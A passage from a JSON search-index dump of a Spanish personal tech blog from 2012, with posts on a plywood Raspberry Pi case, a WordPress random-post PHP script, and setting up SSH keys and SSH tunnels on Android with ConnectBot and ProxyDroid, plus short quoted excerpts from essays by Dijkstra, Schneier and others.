laterales cortas en 3mm en cada lado las piezas superior e inferior tienen la misma medida que en el plano Éste es el resultado:\nReferencias » Punnet, a home printable cardboard case for your Raspberry Pi\n","permalink":"http://karpoke.ignaciocano.com/2012/07/27/carcasa-en-madera-de-contrachapado-para-raspberry-pi/","summary":"\u003cp\u003ePor ahora, la Raspberry Pi viene sin carcasa, por lo que no sólo hay\nopciones comerciales, sino que la comunidad ha tenido ideas muy\ncreativas: [\u003ca href=\"http://www.raspberrypi.org/archives/tag/cases\"\u003e1\u003c/a\u003e], [\u003ca href=\"http://venturebeat.com/2012/07/16/9-amazing-raspberry-pi-case-mods-including-one-that-looks-like-a-raspberry/\"\u003e2\u003c/a\u003e] y [\u003ca href=\"http://www.makeuseof.com/tag/8-interesting-diy-raspberry-pi-case-ideas/\"\u003e3\u003c/a\u003e].\u003c/p\u003e\n\u003cp\u003eEntre todas las opciones, la de \u003ca href=\"http://www.raspberrypi.org/archives/1310\"\u003eimprimir tu propia carcasa\u003c/a\u003e me ha\nllamado la atención. Es sencilla, rápida de hacer y, sobre todo, incluye\nun \u003ca href=\"http://squareitround.co.uk/Resources/Punnet_net_Mk1.pdf\"\u003eplano\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eUtilizando este plano como base, hemos fabricado una carcasa en madera\nde contrachapado de 3mm. Las dimensiones del plano encajan en la\nRaspberry Pi como anillo al dedo. Lo único que hemos tenido que tener en\ncuenta es el grosor de la madera para las piezas laterales:\u003c/p\u003e","title":"Carcasa en madera de contrachapado para Raspberry Pi"},{"content":"Si queremos añadir un enlace que nos permita saltar a una entrada aleatoria de un blog en WordPress, basta crear un archivo que contenga lo siguiente:\n\u0026lt;?php require(\u0026#39;wp-blog-header.php\u0026#39;); query_posts(array(\u0026#39;orderby\u0026#39; =\u0026gt; \u0026#39;rand\u0026#39;, \u0026#39;showposts\u0026#39; =\u0026gt; 1)); if (have_posts()) : the_post(); $url = get_permalink($post-\u0026gt;id); header(\u0026#34;Location: \u0026#34; . $url); endif; wp_reset_query(); ?\u0026gt; Guardamos el archivo en una ruta accesible, por ejemplo en la raíz del blog.\nSólo queda añadir el enlace para que nos lleve a una entrada aleatoria.\nPS: Recordando una vieja entrada en Microsiervos.\nActualizado el 28 de septiembre de 2012 WordPress puede utilizar URLs claras para enlazar a los artículos, categorías, etiquetas, páginas o archivos. Si queremos que el enlace al script sea del mismo tipo, podemos añadir las siguientes líneas al fichero .htaccess de la raíz del sitio:\nRewriteEngine On RewriteBase /blog/ RewriteRule ^salta/$ salta.php Referencias » Function Reference/query posts » The Loop » Template Tags/get posts\n","permalink":"http://karpoke.ignaciocano.com/2012/07/27/saltar-a-una-entrada-aleatoria-en-wordpress/","summary":"\u003cp\u003eSi queremos añadir un enlace que nos permita saltar a una entrada\naleatoria de un blog en WordPress, basta crear un archivo que contenga\nlo siguiente:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u0026lt;?php\nrequire(\u0026#39;wp-blog-header.php\u0026#39;);\nquery_posts(array(\u0026#39;orderby\u0026#39; =\u0026gt; \u0026#39;rand\u0026#39;, \u0026#39;showposts\u0026#39; =\u0026gt; 1));\nif (have_posts()) : the_post();\n$url = get_permalink($post-\u0026gt;id);\n        header(\u0026#34;Location: \u0026#34; . $url);\nendif;\nwp_reset_query();\n?\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eGuardamos el archivo en una ruta accesible, por ejemplo en la raíz del\nblog.\u003c/p\u003e\n\u003cp\u003eSólo queda añadir el enlace para que nos lleve a una \u003ca href=\"/salta/\"\u003eentrada\naleatoria\u003c/a\u003e.\u003c/p\u003e","title":"Saltar a una entrada aleatoria en WordPress"},{"content":" As a result of a long sequence of coincidences I entered the programming profession officially on the first spring morning of 1952 and as far as I have been able to trace, I was the first Dutchman to do so in my country. In retrospect the most amazing thing was the slowness with which, at least in my part of the world, the programming profession emerged, a slowness which is now hard to believe. But I am grateful for two vivid recollections from that period that establish that slowness beyond any doubt.\nAfter having programmed for some three years, I had a discussion with A. van Wijngaarden, who was then my boss at the Mathematical Centre in Amsterdam, a discussion for which I shall remain grateful to him as long as I live. The point was that I was supposed to study theoretical physics at the University of Leiden simultaneously, and as I found the two activities harder and harder to combine, I had to make up my mind, either to stop programming and become a real, respectable theoretical physicist, or to carry my study of physics to a formal completion only, with a minimum of effort, and to become\u0026hellip;.., yes what? A programmer? But was that a respectable profession? For after all, what was programming? Where was the sound body of knowledge that could support it as an intellectually respectable discipline? I remember quite vividly how I envied my hardware colleagues, who, when asked about their professional competence, could at least point out that they knew everything about vacuum tubes, amplifiers and the rest, whereas I felt that, when faced with that question, I would stand empty-handed. Full of misgivings I knocked on van Wijngaarden’s office door, asking him whether I could ”speak to him for a moment”; when I left his office a number of hours later, I was another person. For after having listened to my problems patiently, he agreed that up till that moment there was not much of a programming discipline, but then he went on to explain quietly that automatic computers were here to stay, that we were just at the beginning and could not I be one of the persons called to make programming a respectable discipline in the years to come? This was a turning point in my life and I completed my study of physics formally as quickly as I could. One moral of the above story is, of course, that we must be very careful when we give advice to younger people; sometimes they follow it!\n» Edsger W. Dijkstra | cs.utexas.edu\n","permalink":"http://karpoke.ignaciocano.com/2012/07/26/the-humble-programmer/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAs a result of a long sequence of coincidences I entered the\nprogramming profession officially on the first spring morning of 1952\nand as far as I have been able to trace, I was the first Dutchman to\ndo so in my country. In retrospect the most amazing thing was the\nslowness with which, at least in my part of the world, the programming\nprofession emerged, a slowness which is now hard to believe. But I am\ngrateful for two vivid recollections from that period that establish\nthat slowness beyond any doubt.\u003c/p\u003e","title":"The Humble Programmer"},{"content":" System AdministratorAppreciation Dayhis website from its box, installed an operating system, patched it for security, made sure the power and air conditioning was working in the server room, monitored it for stability, set up the software, and kept backups in case anything went wrong. All to serve this webpage.\n» sysadminday.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/26/system-administrator-appreciation-day/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSystem AdministratorAppreciation Dayhis website from its box,\ninstalled an operating system, patched it for security, made sure the\npower and air conditioning was working in the server room, monitored\nit for stability, set up the software, and kept backups in case\nanything went wrong. All to serve this webpage.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://sysadminday.com/\"\u003esysadminday.com\u003c/a\u003e\u003c/p\u003e","title":"System Administrator Appreciation Day"},{"content":" I regularly receive e-mail from people who want advice on how to learn more about computer security, either as a course of study in college or as an IT person considering it as a career choice.\nFirst, know that there are many subspecialties in computer security. You can be an expert in keeping systems from being hacked, or in creating unhackable software. You can be an expert in finding security problems in software, or in networks. You can be an expert in viruses, or policies, or cryptography. There are many, many opportunities for many different skill sets. You don’t have to be a coder to be a security expert.\nIn general, though, I have three pieces of advice to anyone who wants to learn computer security.\n» Bruce Schneier | schneier.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/24/so-you-want-to-be-a-security-expert/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI regularly receive e-mail from people who want advice on how to learn\nmore about computer security, either as a course of study in college\nor as an IT person considering it as a career choice.\u003c/p\u003e\n\u003cp\u003eFirst, know that there are many subspecialties in computer security.\nYou can be an expert in keeping systems from being hacked, or in\ncreating unhackable software. You can be an expert in finding security\nproblems in software, or in networks. You can be an expert in viruses,\nor policies, or cryptography. There are many, many opportunities for\nmany different skill sets. You don’t have to be a coder to be a\nsecurity expert.\u003c/p\u003e","title":"So You Want to Be a Security Expert"},{"content":" Muchos de nosotros somos auténticos gamers en Android, y como buenos jugones, nos encantan los juegos de vieja escuela. Sí, ya sabéis, los clásicos: Mario Kart, Super Mario 64, cualquier juego de la Nes/Snes, etc¦ Y digo yo, con estos auténticas bestias de Android que tenemos, ¿no deberíamos poder jugar a todos ellos? Pues efectivamente, se puede. El único problema es que por razón X, a Google no le gusta mucho que hayan emuladores en el Play Store y por ello se encuentran tan pocos. Pero tranquilos que hoy os traemos una recopilación de todos los emuladores actuales a los que se puede jugar en Android\n» Adrian | elandroidelibre.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/24/todos-los-emuladores-para-android/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMuchos de nosotros somos auténticos gamers en Android, y como buenos\njugones, nos encantan los juegos de vieja escuela. Sí, ya sabéis, los\nclásicos: Mario Kart, Super Mario 64, cualquier juego de la Nes/Snes,\netc¦ Y digo yo, con estos auténticas bestias de Android que tenemos,\n¿no deberíamos poder jugar a todos ellos? Pues efectivamente, se\npuede. El único problema es que por razón X, a Google no le gusta\nmucho que hayan emuladores en el Play Store y por ello se encuentran\ntan pocos. Pero tranquilos que hoy os traemos una recopilación de\ntodos los emuladores actuales a los que se puede jugar en Android\u003c/p\u003e","title":"Todos los emuladores para Android"},{"content":" Ok, perhaps I jest. As a Python instructor, understanding decorators is a topic I find students consistently struggle with upon first exposure. That’s because decorators are hard to understand! Getting decorators requires understanding several functional programming concepts as well as feeling comfortable with some unique features of Python’s function definition and function calling syntax. _Using_ decorators is easy (see Section 10)! But writing them can be complicated.\nI can’t make decorators easy - but maybe by walking through each piece of the puzzle one step at a time I can help you feel more confident in understanding decorators[1]. Because decorators are complex this is going to be a long article - but stick with it! I promise to make each piece as simple as possible - and if you understand each piece, you’ll understand how decorators work! I’m trying to assume minimal Python knowledge but this will probably be most helpful to people who have at least a casual working exposure to Python.\n» Simeon Franklin | simeonfranklin.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/24/understanding-python-decorators-in-12-easy-steps/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOk, perhaps I jest. As a Python instructor, understanding decorators\nis a topic I find students consistently struggle with upon first\nexposure. That’s because decorators are hard to understand! Getting\ndecorators requires understanding several functional programming\nconcepts as well as feeling comfortable with some unique features of\nPython’s function definition and function calling syntax. _Using_\ndecorators is easy (see Section 10)! But writing them can be\ncomplicated.\u003c/p\u003e\n\u003cp\u003eI can’t make decorators easy - but maybe by walking through each piece\nof the puzzle one step at a time I can help you feel more confident in\nunderstanding decorators[1]. Because decorators are complex this is\ngoing to be a long article - but stick with it! I promise to make each\npiece as simple as possible - and if you understand each piece, you’ll\nunderstand how decorators work! I’m trying to assume minimal Python\nknowledge but this will probably be most helpful to people who have at\nleast a casual working exposure to Python.\u003c/p\u003e","title":"Understanding Python Decorators in 12 Easy Steps!"},{"content":" Nick is building a universe on his computer. He’s already mapped out his first planet: an anvil-shaped world called Denthaim that is home to gnomes and gods, along with a three-gendered race known as kiman. As he tells me about his universe, Nick looks up at the ceiling, humming fragments of a melody over and over. ”I’m thinking of making magic a form of quantum physics, but I haven’t decided yet, actually,” he explains. The music of his speech is pitched high, alternately poetic and pedantic - as if the soul of an Oxford don has been awkwardly reincarnated in the body of a chubby, rosy-cheeked boy from Silicon Valley. Nick is 11 years old.\nNick’s father is a software engineer, and his mother is a computer programmer. They’ve known that Nick was an unusual child for a long time. He’s infatuated with fantasy novels, but he has a hard time reading people. Clearly bright and imaginative, he has no friends his own age. His inability to pick up on hidden agendas makes him easy prey to certain cruelties, as when some kids paid him a few dollars to wear a ridiculous outfit to school.\nOne therapist suggested that Nick was suffering from an anxiety disorder. Another said he had a speech impediment. Then his mother read a book called Asperger’s Syndrome: A Guide for Parents and Professionals. In it, psychologist Tony Attwood describes children who lack basic social and motor skills, seem unable to decode body language and sense the feelings of others, avoid eye contact, and frequently launch into monologues about narrowly defined - and often highly technical - interests. Even when very young, these children become obsessed with order, arranging their toys in a regimented fashion on the floor and flying into tantrums when their routines are disturbed. As teenagers, they’re prone to getting into trouble with teachers and other figures of authority, partly because the subtle cues that define societal hierarchies are invisible to them.\n» Steve Silberman | wired.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/24/the-geek-syndrome/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNick is building a universe on his computer. He’s already mapped out\nhis first planet: an anvil-shaped world called Denthaim that is home\nto gnomes and gods, along with a three-gendered race known as kiman.\nAs he tells me about his universe, Nick looks up at the ceiling,\nhumming fragments of a melody over and over. ”I’m thinking of making\nmagic a form of quantum physics, but I haven’t decided yet, actually,”\nhe explains. The music of his speech is pitched high, alternately\npoetic and pedantic - as if the soul of an Oxford don has been\nawkwardly reincarnated in the body of a chubby, rosy-cheeked boy from\nSilicon Valley. Nick is 11 years old.\u003c/p\u003e","title":"The Geek Syndrome"},{"content":" Autism may be associated with mathematical skills. Autism researcher Simon Baron-Cohen has published studies that autism is more prevalent in the familes of physicists, engineers, and mathematicians. Unusual mathematical skills are reported in a small percentage of cases of ”classic autism.” Movies, television, and popular culture such as Rainman (1988), Mercury Rising (1998), and many other works often play up this rare association by presenting autistic characters with extreme mathematical abilities.\nIt has frequently been suggested that various scientists and mathematicians including the Nobel Prize winning physicist Paul Dirac, the Russian mathematician and Fields Medal refuser Grigori Perelman, and Fields Medal winner Richard Borcherds have had or have Asperger’s Syndrome, now included in the autism spectrum. Vernon L. Smith who won the Nobel Prize for Economics in 2002 has stated that he has Asperger’s Syndrome. Wired Magazine popularized the notion of an association of Asperger’s syndrome and autism with computer technology and math in the article The Geek Syndrome by Steve Silberman.\n» John F. McGowan | math-blog.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/24/the-mathematics-of-autism/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAutism may be associated with mathematical skills. Autism researcher\nSimon Baron-Cohen has published studies that autism is more prevalent\nin the familes of physicists, engineers, and mathematicians. Unusual\nmathematical skills are reported in a small percentage of cases of\n”classic autism.” Movies, television, and popular culture such as\nRainman (1988), Mercury Rising (1998), and many other works often play\nup this rare association by presenting autistic characters with\nextreme mathematical abilities.\u003c/p\u003e","title":"The Mathematics of Autism"},{"content":" Lazy sysadmin is the best sysadmin –Anonymous\nSystem administrators job is not visible to other IT groups or end-users. Mostly they look at administrators and wonder why sysadmins don’t seem to have any work.\nIf you see a sysadmin who is always running around, and trying to put down fire, and constantly dealing with production issues, you might think he is working very hard, and really doing his job. But in reality he is not really doing his job.\nIf you see a sysadmin (UNIX/Linux sysadmin, or DBA, or Network Administrators), who doesn’t seem to be doing much around the office that you can see, he always seem to be relaxed, and he don’t seem to have any visible work, you can be assured that he is doing his job.\n» Ramesh Natarajan | thegeekstuff.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/24/12-reasons-why-every-linux-system-administrator-should-be-lazy/","summary":"\u003cblockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eLazy sysadmin is the best sysadmin –Anonymous\u003c/p\u003e\n\u003cblockquote\u003e\n\u003c/blockquote\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eSystem administrators job is not visible to other IT groups or\nend-users. Mostly they look at administrators and wonder why sysadmins\ndon’t seem to have any work.\u003c/p\u003e\n\u003cp\u003eIf you see a sysadmin who is always running around, and trying to put\ndown fire, and constantly dealing with production issues, you might\nthink he is working very hard, and really doing his job. But in\nreality he is not really doing his job.\u003c/p\u003e","title":"12 Reasons Why Every Linux System Administrator Should be Lazy"},{"content":" While you may have some idea about what bitrate is, the ”can audiophiles really tell the difference” argument has raged on for quite some time, and it’s hard to get people to drop their egos and actually explain what these things mean and whether they really matter. Here’s a bit of information on bitrate and how it applies to our practical music listening experience.\n» Whitson Gordon | lifehacker.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/24/does-bitrate-really-make-a-difference-in-my-music/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhile you may have some idea about what bitrate is, the ”can\naudiophiles really tell the difference” argument has raged on for\nquite some time, and it’s hard to get people to drop their egos and\nactually explain what these things mean and whether they really\nmatter. Here’s a bit of information on bitrate and how it applies to\nour practical music listening experience.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Whitson Gordon | \u003ca href=\"http://lifehacker.com/5810575/does-bitrate-really-make-a-difference-in-my-music\"\u003elifehacker.com\u003c/a\u003e\u003c/p\u003e","title":"Does Bitrate Really Make a Difference In My Music?"},{"content":"Si necesitamos conectarnos desde nuestro terminal con Android a una red WiFi que no es segura, ya sea porque es una red abierta o porque no es de confianza, podemos utilizar ConnectBot para crear un túnel SSH para encauzar todas las conexiones que realicemos desde el terminal a través de él.\nPara esto necesitaremos:\nAcceso a un servidor SSH Un cliente SSH para Android, por ejemplo ConnectBot Un cliente proxy para Android, por ejemplo ProxyDroid ProxyDroid es una aplicación que permite crear un proxy transparente en terminales Android.\nSi queremos que todas las conexiones vayan a través del proxy de forma transparente, es decir, sin tener que configurar nada más en el terminal ni en las aplicaciones, necesitaremos que el terminal esté rooteado.\nEl primer paso será conectarnos con ConnectBot al servidor SSH mediante claves, para evitar tener que estar introduciendo contraseñas, de tal manera que con añadir un widget la conexión se realizará con una sólo pulsación.\nPara crear la redirección de puertos en ConnectBot, realizamos una pulsación larga sobre la conexión a utilizar, que ya debemos tener configurada previamente, y seleccionamos Editar redirección de puertos. Pulsamos en Menú \u0026gt; Añadir redirección de puertos y utilizamos los siguientes datos:\nNombre: el nombre que le damos a esta redirección de puertos (puede ser cualquiera) Tipo: Dinámico (SOCKS) Puerto fuente: 3128 (es el que utiliza ProxyDroid por defecto) Destino: no es relevante En ProxyDroid, deberemos utilizar los siguientes datos:\nHost: localhost Puerto: 3128 Proxy Type: SOCKS5 Global Proxy: Lo marcamos para que todas las peticiones vayan por el _proxy_. Necesitaremos que el teléfono esté _rooteado_ Añadimos un widget para facilitar la activación del proxy.\nDe esta forma, para conectarnos a una red WiFi insegura:\nactivamos el proxy antes de conectarnos nos conectamos a la red WiFi creamos el túnel SSH conectándonos al servidor remoto Si la red WiFi tiene un portal cautivo, deberemos conectarnos antes de activar el proxy y acceder mediante el navegador para introducir la contraseña o aceptar las condiciones del servicio, ya que de lo contrario no podremos conectarnos al servidor SSH (a no ser que encontremos una manera de saltarnos dicho portal cautivo).\nReferencias » ConnectBot en el market » ProxyDroid en el market\n","permalink":"http://karpoke.ignaciocano.com/2012/07/24/conectar-de-forma-segura-en-redes-abiertas-con-android-connectbot-y-proxydroid/","summary":"\u003cp\u003eSi necesitamos conectarnos desde nuestro terminal con Android a una red\nWiFi que no es segura, ya sea porque es una red abierta o porque no es\nde confianza, podemos utilizar ConnectBot para crear un túnel SSH para\nencauzar todas las conexiones que realicemos desde el terminal a través\nde él.\u003c/p\u003e\n\u003cp\u003ePara esto necesitaremos:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAcceso a un servidor SSH\u003c/li\u003e\n\u003cli\u003eUn cliente SSH para Android, por ejemplo ConnectBot\u003c/li\u003e\n\u003cli\u003eUn cliente proxy para Android, por ejemplo ProxyDroid\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"http://code.google.com/p/proxydroid/\"\u003eProxyDroid\u003c/a\u003e es una aplicación que permite crear un \u003cem\u003eproxy\u003c/em\u003e\ntransparente en terminales Android.\u003c/p\u003e","title":"Conectar de forma segura en redes abiertas con Android, ConnectBot y ProxyDroid"},{"content":"ConnectBot es, en mi humilde opinión, el mejor cliente SSH para Android. Nos permite conectarnos de forma segura a nuestro servidor SSH, ya sea directamente o mediante la creación de un túnel SSH que sirva de proxy al resto de aplicaciones.\nLa manera más segura de conectarnos es mediante la utilización de claves. Este es un sistema de autenticación basado en criptografía asimétrica, más seguro que utilizar simples contraseñas.\nConnectBot no sólo permite utilizar claves, sino que también nos permite crearlas e importarlas. Para poder conectarnos a nuestro servidor sin necesidad de utilizar contraseñas, lo primero será que éste esté configurado para aceptar claves. En particular, en el fichero /etc/ssh/sshd_config, debemos tener la directiva:\nPubkeyAuthentication yes Si queremos importar una clave para ser utilizada por ConnectBot, lo único que tendremos que hacer es guardarla en la raíz de la tarjeta de memoria e ir a Menú \u0026gt; Administrar claves públicas \u0026gt; Menú \u0026gt; Importar.\nOtra opción es generar un par de claves. Para ello, vamos a Menú \u0026gt; Administrar claves públicas \u0026gt; Menú \u0026gt; Generar, y utilizamos los siguientes datos:\nNombre para la clave: keyname (podemos usar el nombre que queramos para poder identificarla) Tipo: RSA Bits: 4096 Contraseña: si queremos, podemos optar por dejarla en blanco, sabiendo que si la clave cae en malas manos puede tener una puerta abierta hacia nuestro servidor. Cargar al inicio: lo marcamos si queremos que la clave se cargue en memoria nada más arrancar el teléfono. Si la clave no está cargada en memoria, ConnectBot no intentará utilizarla. Confirmar antes de cargar: lo marcamos si queremos que nos pida confirmación cuando se vaya a utilizar la clave. El siguiente paso es copiar la clave pública al listado de claves autorizadas para el usuario en el servidor. La forma más rápida y sencilla y es ir al gestor de claves y copiamos la clave pública de la clave en cuestión (realizando una pulsación larga sobre la misma). Luego, nos conectamos al servidor normalmente, mediante usuario y contraseña, y añadimos la clave mediante el siguiente comando (aquí pegamos la clave pública que habíamos copiado):\nusername@remote:~$ echo \u0026#34;ssh-rsa AAAA.....(resto de la clave)\u0026#34; \u0026gt;\u0026gt; .ssh/authorized_keys La próxima vez que nos conectemos mediante ConnectBot ya no necesitaremos utilizar usuario ni contraseña. Si no hemos seleccionado cargar la clave al inicio, y la clave no está cargada en memoria en el momento de hacer el intento de conexión, ConnectBot nos pedirá que nos autentiquemos mediante usuario y contraseña. Si hemos marcado que nos avise antes de usar la clave, y la clave está cargada en memoria, nos pedirá confirmación antes de usarla.\nDenegar el acceso Si, por cualquier motivo, queremos denegar el acceso a dicha clave al servidor, lo único que tenemos que hacer es borrarla del fichero ~/.ssh/authorized_keys. Una sencilla forma de hacerlo es mediante el nombre que hemos utilizado para la clave:\nusername@remote:~$ sed -i \u0026#39;/keyname$/d\u0026#39; ~/.ssh/authorized_keys Referencias » ConnectBot en el market\n","permalink":"http://karpoke.ignaciocano.com/2012/07/24/conectar-a-un-servidor-ssh-desde-android-mediante-connectbot-utilizando-claves/","summary":"\u003cp\u003e\u003ca href=\"http://code.google.com/p/connectbot/\"\u003eConnectBot\u003c/a\u003e es, en mi humilde opinión, el mejor cliente SSH para\nAndroid. Nos permite conectarnos de forma segura a nuestro servidor SSH,\nya sea directamente o mediante la creación de un túnel SSH que sirva de\n\u003cem\u003eproxy\u003c/em\u003e al resto de aplicaciones.\u003c/p\u003e\n\u003cp\u003eLa manera más segura de conectarnos es mediante la utilización de\nclaves. Este es un sistema de autenticación basado en criptografía\nasimétrica, más seguro que utilizar \u003cem\u003esimples\u003c/em\u003e contraseñas.\u003c/p\u003e\n\u003cp\u003eConnectBot no sólo permite utilizar claves, sino que también nos permite\ncrearlas e importarlas. Para poder conectarnos a nuestro servidor sin\nnecesidad de utilizar contraseñas, lo primero será que éste esté\n\u003ca href=\"/2011/03/03/conectarse-por-ssh-solo-usando-la-clave/\"\u003econfigurado para aceptar claves\u003c/a\u003e. En particular, en el fichero\n\u003ccode\u003e/etc/ssh/sshd_config\u003c/code\u003e, debemos tener la directiva:\u003c/p\u003e","title":"Conectar a un servidor SSH desde Android mediante ConnectBot utilizando claves"},{"content":" In the beginning there was NCSA Mosaic, and Mosaic called itself NCSA_Mosaic/2.0 (Windows 3.1), and Mosaic displayed pictures along with text, and there was much rejoicing. And behold, then came a new web browser known as ”Mozilla”, being short for ”Mosaic Killer,” but Mosaic was not amused, so the public name was changed to Netscape, and Netscape called itself Mozilla/1.0 (Win3.1), and there was more rejoicing. And Netscape supported frames, and frames became popular among the people, but Mosaic did not support frames, and so came ”user agent sniffing” and to ”Mozilla” webmasters sent frames, but to other browsers they sent not frames.\n» Aaron Andersen | webaim.org\n","permalink":"http://karpoke.ignaciocano.com/2012/07/17/history-of-the-browser-user-agent-string/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn the beginning there was NCSA Mosaic, and Mosaic called itself\nNCSA_Mosaic/2.0 (Windows 3.1), and Mosaic displayed pictures along\nwith text, and there was much rejoicing.\nAnd behold, then came a new web browser known as ”Mozilla”, being\nshort for ”Mosaic Killer,” but Mosaic was not amused, so the public\nname was changed to Netscape, and Netscape called itself Mozilla/1.0\n(Win3.1), and there was more rejoicing. And Netscape supported frames,\nand frames became popular among the people, but Mosaic did not support\nframes, and so came ”user agent sniffing” and to ”Mozilla” webmasters\nsent frames, but to other browsers they sent not frames.\u003c/p\u003e","title":"History of the browser user-agent string"},{"content":" The code behind the Google doodle celebrating Alan Turing’s 100th birthday is now up on Google code. This animated logic puzzle game appeared on the Google homepage on June 23, 2012. If you missed it, you can still play it in the doodle archives.\nOur doodle for Turing’s 100th birthday showed a live action Turing Machine with twelve interactive programming puzzles. Turing Machines are theoretical objects in formal logic, not physical things, so we walked a fine line between technical accuracy and accessibility. We focused on finding a good representation for programs and choosing puzzles of appropriate complexity. We did considerable user testing and iteration, more than for any past doodle.\nJered Wierzbicki and Corrie Scalisi google-opensource.blogspot.com.es\n","permalink":"http://karpoke.ignaciocano.com/2012/07/17/a-turing-complete-puzzle-game/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe code behind the Google doodle celebrating Alan Turing’s 100th birthday is\nnow up on Google code. This animated logic puzzle game appeared on the Google\nhomepage on June 23, 2012. If you missed it, you can still play it in the\ndoodle archives.\u003c/p\u003e\n\u003cp\u003eOur doodle for Turing’s 100th birthday showed a live action Turing Machine\nwith twelve interactive programming puzzles. Turing Machines are theoretical\nobjects in formal logic, not physical things, so we walked a fine line\nbetween technical accuracy and accessibility. We focused on finding a good\nrepresentation for programs and choosing puzzles of appropriate complexity.\nWe did considerable user testing and iteration, more than for any past\ndoodle.\u003c/p\u003e","title":"A Turing Complete Puzzle Game"},{"content":" Millones de impulsos llegan al cerebro desde distintos sentidos. Millones llegan incluso desde un sentido como la vista. El cerebro tiene múltiples áreas de procesamiento. En la vista por ejemplo se procesa en centros distintos el color, la forma o el movimiento. Cada impulso recorre un camino diferente al resto. Algunos son más largos y otros son más cortos. Por lo tanto, tardan distinto tiempo en llegar al cerebro. ¿Cómo sabe el cerebro que dos impulsos que sucedieron a la vez pero llegan en distinto momento son en realidad simultáneos?\nEl cerebro no es una cámara fotográfica. El cerebro construye el mundo, no toma una imagen fija. El ejemplo de la vista es claro. Vemos un auto rojo moverse. No vemos una sucesión de manchas rojas y una sucesión de formas de auto en distintas posiciones. Es lo que se llama la unión de características. El cerebro lo integra todo y vemos un auto rojo moverse.\n» Antonio Orbe | alt1040.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/16/un-largo-segundo-en-el-cerebro/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMillones de impulsos llegan al cerebro desde distintos sentidos.\nMillones llegan incluso desde un sentido como la vista. El cerebro\ntiene múltiples áreas de procesamiento. En la vista por ejemplo se\nprocesa en centros distintos el color, la forma o el movimiento. Cada\nimpulso recorre un camino diferente al resto. Algunos son más largos y\notros son más cortos. Por lo tanto, tardan distinto tiempo en llegar\nal cerebro. ¿Cómo sabe el cerebro que dos impulsos que sucedieron a la\nvez pero llegan en distinto momento son en realidad simultáneos?\u003c/p\u003e","title":"Un largo segundo en el cerebro"},{"content":" This Knowledge Base was put together and is maintained by Roberto Salgado, Co-Founder of Websec. It is a compilation of books, papers, cheatsheets and testing done by Roberto over the years.\n» Roberto Salgado | websec.ca\n","permalink":"http://karpoke.ignaciocano.com/2012/07/15/mysql-mssql-and-oracle-sql-injection-compilation/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis Knowledge Base was put together and is maintained by Roberto\nSalgado, Co-Founder of Websec. It is a compilation of books, papers,\ncheatsheets and testing done by Roberto over the years.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Roberto Salgado | \u003ca href=\"http://websec.ca/kb/sql_injection\"\u003ewebsec.ca\u003c/a\u003e\u003c/p\u003e","title":"MySQL, MSSQL and Oracle SQL Injection Compilation"},{"content":" This page gives brief, visual reference for the most common commands in git. Once you know a bit about how git works, this site may solidify your understanding.\n» Mark Lodato | marklodato.github.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/15/a-visual-git-reference/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis page gives brief, visual reference for the most common commands in git.\nOnce you know a bit about how git works, this site may solidify your\nunderstanding.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Mark Lodato | \u003ca href=\"http://marklodato.github.com/visual-git-guide/index-en.html\"\u003emarklodato.github.com\u003c/a\u003e\u003c/p\u003e","title":"A Visual Git Reference"},{"content":" Debates over technology, technique, and process often go nowhere because the participants are arguing from different levels of aspiration.\nYou’re unlikely to convince someone they should switch to programming Ruby for its beauty, if they’re merely looking to make a living as a single consultant serving local businesses in Schaumburg, Illinois.\nQuestions such as ”does this run on my existing web host?” or ”will my clients want something their nephew web designer hasn’t even heard of?” matter far more. Their aspirations are local, finding something that (sorta) works, and getting paid.\n» David | 37signals.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/15/levels-of-aspiration/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDebates over technology, technique, and process often go nowhere\nbecause the participants are arguing from different levels of\naspiration.\u003c/p\u003e\n\u003cp\u003eYou’re unlikely to convince someone they should switch to programming\nRuby for its beauty, if they’re merely looking to make a living as a\nsingle consultant serving local businesses in Schaumburg, Illinois.\u003c/p\u003e\n\u003cp\u003eQuestions such as ”does this run on my existing web host?” or ”will my\nclients want something their nephew web designer hasn’t even heard\nof?” matter far more. Their aspirations are local, finding something\nthat (sorta) works, and getting paid.\u003c/p\u003e","title":"Levels of aspiration"},{"content":" Aparentemente esta pregunta parece absurda, ¿Como no van a existir los bellos colores de los paisajes que podemos observar a diario? El azul del cielo, el verde de las hojas de los árboles\u0026hellip; parece evidente que los colores existen y son uno de los atributos más fundamentales de todos los objetos que observamos. Sin embargo, como veremos a continuación la respuesta a esta pregunta es asombrosa e inesperada. Lo primero que tenemos que hacer para tratar de responderla es analizar brevemente como y por que vemos los objetos que nos 